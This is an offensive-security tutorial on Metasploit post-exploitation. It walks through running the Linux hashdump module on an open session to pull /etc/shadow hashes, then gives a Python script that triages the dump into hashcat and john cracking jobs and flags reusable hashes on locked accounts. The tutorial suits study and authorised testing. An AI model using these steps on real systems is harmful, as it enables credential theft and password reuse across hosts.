I'll have to admit: we have been skipping a few details during exploitation. When using an exploit, you can also set a payload. Think of a payload as the extra set of tools you take in with you so that you can do more once you are on the machine. We will show how to use payloads in later articles.
Post exploitation is the step after breaking into the target machine. Let's look at a post exploitation example in which we dump the password hashes of all users on the target system.
Get an open session
Follow any of our previous exploitation articles to help you get an open session with the target machine.
Post exploitation
Hit Ctrl+Z to put the session into the background. Enter Y when prompted.
With this, the session stays open but is moved to the background so that you can use msfconsole again.
You can have multiple open sessions in the background.
Check your sessions using the command: sessions
Enter the command: use post/linux/gather/hashdump
This command selects the hashdump module. Metasploit stores all its post exploitation modules under the "post" folder. We will go through other modules in later articles.
Enter the command: show options
Normally we set RHOST on an exploit to give it a target. A post exploitation module in Metasploit is instead pointed at an existing session.
Enter the command: set SESSION 1
The "1" simply corresponds to the session id you want the module to run on. You can view your session ids with the "sessions" command shown above.
...and run (Metasploit also accepts exploit here, since it is an alias of run, but run is the usual command for a post module).
What you see on your screen are the users' passwords... in hashed form. Note that the module needs a root session, because /etc/shadow is only readable by root. Hashed passwords are then cracked using password cracking techniques or tools to recover the plaintext passwords, which we can then try on login fields.
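Before handing the dump to a cracker it is worth triaging it: which entries hold a real hash, which algorithm each one uses, which accounts are locked, have no password at all, or are uid 0. The script below is an added example written for this article, not part of the original post or of Metasploit. It assumes the module prints unshadow-style lines (a /etc/passwd record with the password field replaced by the /etc/shadow hash, optionally prefixed by msfconsole's "[+]" marker); the sample lines, salts and hash values are constructed for the example and are not real hashes. The hashcat mode numbers are the standard ones for md5crypt, sha256crypt and sha512crypt; yescrypt is left for john.

```python
"""Triage the output of post/linux/gather/hashdump before cracking it.

Added example, not code from the original post or from Metasploit.
Assumption: lines look like  user:$6$salt$hash:uid:gid:gecos:home:shell
with an optional leading "[+] " status marker.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# crypt(3) scheme identifiers found in /etc/shadow -> (name, hashcat mode).
# yescrypt ($y$) gets no hashcat mode here; feed it to john instead.
SCHEMES = {
    "1": ("md5crypt", 500),
    "5": ("sha256crypt", 7400),
    "6": ("sha512crypt", 1800),
    "y": ("yescrypt", None),
}

# Constructed sample output (fake salts and hashes), not a real dump.
SAMPLE = """\
[+] root:$6$Q1w2E3r4$0123456789abcdef:0:0:root:/root:/bin/bash
[+] daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
[+] alice:$1$xyz12345$qwertyuiop:1000:1000:Alice:/home/alice:/bin/bash
[+] bob:!$6$lockedsalt$lockedhash:1001:1001:Bob:/home/bob:/bin/bash
[+] backup:$y$j9T$salt$hash:1002:1002::/home/backup:/bin/sh
[+] svc:!!:1003:1003::/var/svc:/usr/sbin/nologin
[+] nopass::1004:1004::/home/nopass:/bin/sh
"""

LINE_RE = re.compile(
    r"^(?:\[\+\]\s*)?([^:]+):([^:]*):(\d+):(\d+):([^:]*):([^:]*):([^:]*)$"
)


@dataclass
class Account:
    user: str
    field: str  # raw password field exactly as dumped
    uid: int
    shell: str

    @property
    def locked(self) -> bool:
        # passwd -l / usermod -L prepend "!" (some distros write "!!");
        # "*" means no password was ever set; "" means no password needed.
        return self.field == "" or self.field[0] in "!*"

    @property
    def hash(self) -> Optional[str]:
        # A locked account keeps its old hash behind the "!", so it is still
        # worth cracking: the same password may be reused elsewhere.
        h = self.field.lstrip("!")
        return h if h.startswith("$") else None

    @property
    def scheme(self) -> Optional[str]:
        return self.hash.split("$")[1] if self.hash else None


def parse_hashdump(text: str) -> list[Account]:
    """Parse unshadow-style lines; anything else (status lines, blanks) is skipped."""
    accounts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        user, field, uid, _gid, _gecos, _home, shell = m.groups()
        accounts.append(Account(user, field, int(uid), shell))
    return accounts


def hashcat_jobs(accounts: list[Account]) -> dict:
    """Group crackable hashes by (scheme name, hashcat mode) as 'user:hash' lines,
    the form hashcat's --username option expects."""
    jobs: dict = {}
    for a in accounts:
        if a.hash is None:
            continue
        key = SCHEMES.get(a.scheme, ("unknown", None))
        jobs.setdefault(key, []).append(f"{a.user}:{a.hash}")
    return jobs


def no_password(accounts: list[Account]) -> list[str]:
    """Accounts whose password field is empty: a login prompt may accept no password."""
    return [a.user for a in accounts if a.field == ""]


def superusers(accounts: list[Account]) -> list[str]:
    """Every uid 0 account, not just 'root'; a second uid 0 user is a classic backdoor."""
    return [a.user for a in accounts if a.uid == 0]


if __name__ == "__main__":
    accts = parse_hashdump(SAMPLE)
    print("uid 0 accounts:", superusers(accts))
    print("no password:", no_password(accts))
    for (name, mode), lines in hashcat_jobs(accts).items():
        target = f"hashcat -m {mode} --username" if mode else "john (no hashcat mode)"
        print(f"{name}: {len(lines)} hash(es) -> {target}")
        for line in lines:
            print("   ", line)
```

Paste the module's output in place of SAMPLE, or read it from the loot file Metasploit saves. The point of the locked-account handling is that "!$6$..." is not a dead entry: the hash behind the "!" is the user's last password, which is exactly the kind of value that turns up again on other hosts.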
-Jayesh Kerai (@secjay)